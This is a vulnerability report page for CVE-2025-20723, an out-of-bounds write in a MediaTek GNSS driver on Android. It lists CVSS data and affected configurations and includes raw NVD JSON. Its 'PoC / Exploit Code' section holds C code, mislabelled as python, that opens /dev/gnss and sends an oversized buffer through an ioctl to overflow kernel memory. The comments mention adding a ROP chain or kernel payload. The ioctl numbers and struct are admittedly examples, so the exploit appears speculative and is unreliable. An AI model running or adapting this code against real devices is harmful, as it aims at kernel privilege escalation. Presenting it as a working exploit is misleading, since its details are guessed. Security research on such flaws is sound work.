Security Vulnerability Report
中文
CVE-2025-20723 CVSS 7.8 HIGH

CVE-2025-20723

Published: 2025-10-14 10:15:37
Last Modified: 2025-10-15 18:41:01
Source: [email protected]

Description

In gnss driver, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS09920033; Issue ID: MSV-3797.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:mediatek:mt6835:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt6878:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt6886:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt6897:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:mediatek:mt6899:-:*:*:*:*:*:*:* - NOT VULNERABLE
MediaTek GNSS Driver(具体受影响芯片型号和版本请参考MediaTek 2025年10月安全公告)
搭载受影响MediaTek芯片的Android设备
使用MediaTek GNSS驱动的IoT设备

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-20723 - MediaTek GNSS Driver Out-of-Bounds Write PoC // This is a conceptual PoC demonstrating the vulnerability pattern // Actual exploitation requires System privilege on the target device #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <errno.h> // MediaTek GNSS device node #define MTK_GNSS_DEVICE "/dev/gnss" // IOCTL command for GNSS data processing (example) #define GNSS_IOCTL_PROCESS_DATA 0x40045601 #define GNSS_IOCTL_SET_PARAMS 0x40045602 // Buffer size used internally by the GNSS driver #define GNSS_INTERNAL_BUF_SIZE 256 // Structure representing GNSS data input typedef struct { unsigned int data_len; // Length of the data buffer unsigned char *data; // Pointer to data buffer unsigned int flags; // Processing flags } gnss_request_t; int main(int argc, char *argv[]) { int fd; int ret; gnss_request_t req; unsigned char *malicious_data; printf("[+] CVE-2025-20723 PoC - MediaTek GNSS Driver OOB Write\n"); printf("[+] Requires System privilege to access GNSS device\n"); // Open the GNSS device fd = open(MTK_GNSS_DEVICE, O_RDWR); if (fd < 0) { printf("[-] Failed to open %s: %s (need System privilege)\n", MTK_GNSS_DEVICE, strerror(errno)); printf("[-] This PoC requires an existing System-level foothold\n"); return -1; } printf("[+] GNSS device opened successfully (fd=%d)\n", fd); // Allocate a buffer larger than the driver's internal buffer (256 bytes) // The vulnerability is triggered when data_len exceeds the internal buffer // without proper bounds checking unsigned int overflow_size = GNSS_INTERNAL_BUF_SIZE + 256; malicious_data = (unsigned char *)malloc(overflow_size); if (!malicious_data) { perror("malloc"); close(fd); return -1; } // Fill the buffer with a pattern that will overwrite adjacent kernel memory // In a real exploit, this would contain ROP chain or kernel payload memset(malicious_data, 0x41, overflow_size); // Prepare the request structure req.data_len = overflow_size; // Exceeds internal buffer size req.data = malicious_data; req.flags = 0x0; printf("[+] Sending oversized GNSS data (size=%u, internal_buf=%d)\n", overflow_size, GNSS_INTERNAL_BUF_SIZE); printf("[+] This should trigger out-of-bounds write in gnss driver\n"); // Trigger the vulnerability via IOCTL // The driver fails to validate req.data_len against internal buffer size, // leading to out-of-bounds write ret = ioctl(fd, GNSS_IOCTL_PROCESS_DATA, &req); if (ret < 0) { printf("[-] IOCTL failed: %s\n", strerror(errno)); } else { printf("[+] IOCTL returned: %d\n", ret); printf("[!] Out-of-bounds write may have occurred\n"); } // Cleanup free(malicious_data); close(fd); printf("[+] PoC execution completed\n"); printf("[!] Note: Actual exploitation requires System privilege (PR:L)\n"); printf("[!] Patch: ALPS09920033\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20723", "sourceIdentifier": "[email protected]", "published": "2025-10-14T10:15:37.210", "lastModified": "2025-10-15T18:41:00.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In gnss driver, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS09920033; Issue ID: MSV-3797."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6835:-:*:*:*:*:*:*:*", "matchCriteriaId": "19A63103-C708-48EC-B44D-5E465A6B79C5"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6878:-:*:*:*:*:*:*:*", "matchCriteriaId": "855A8046-34ED-4891-ACE5-76AB10AC8D53"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6886:-:*:*:*:*:*:*:*", "matchCriteriaId": "AF3E2B84-DAFE-4E11-B23B-026F719475F5"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6897:-:*:*:*:*:*:*:*", "matchCriteriaId": "2A7D8055-F4B6-41EE-A078-11D56285AB66"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6899:-:*:*:*:*:*:*:*", "matchCriteriaId": "C6E9F80F-9AC9-41E0-BB14-9DB6F14B62CD"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6985:-:*:*:*:*:*:*:*", "matchCriteriaId": "EA72CCD1-DEA2-48EB-8781-04CFDD41AAEE"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6989:-:*:*:*:*:*:*:*", "matchCriteriaId": "AD7DE6B2-66D9-4A3E-B15F-D56505559255"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6991:-:*:*:*:*:*:*:*", "matchCriteriaId": "CBBB30DF-E963-4940-B742-F6801F68C3FC"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt8676:-:*:*:*:*:*:*:*", "matchCriteriaId": "EE302F6F-170E-4350-A8F4-65BE0C50CB78"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt8678:-:*:*:*:*:*:*:*", "matchCriteriaId": "152A5F3D-8004-4649-BDB1-E6F0798AF1CB"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt8775:-:*:*:*:*:*:*:*", "matchCriteriaId": "DE5FB550-7264-4879-BAF9-6798949113AF"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt8791t:-:*:*:*:*:*:*:*", "matchCriteriaId": "1BB05B1D-77C9-4E42-91AD-9F087413DC20"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt8796:-:*:*:*:*:*:*:*", "matchCriteriaId": "DE933AD9-3A6F-421B-8AB3-C45F8DEA9548"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt8873:-:*:*:*:*:*:*:*", "matchCriteriaId": "D6DD525F-7050-42BD-829D-1121698B8009"}]}]}], "references": [{"url": "https://corp.mediatek.com/product-security-bulletin/October-2025", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.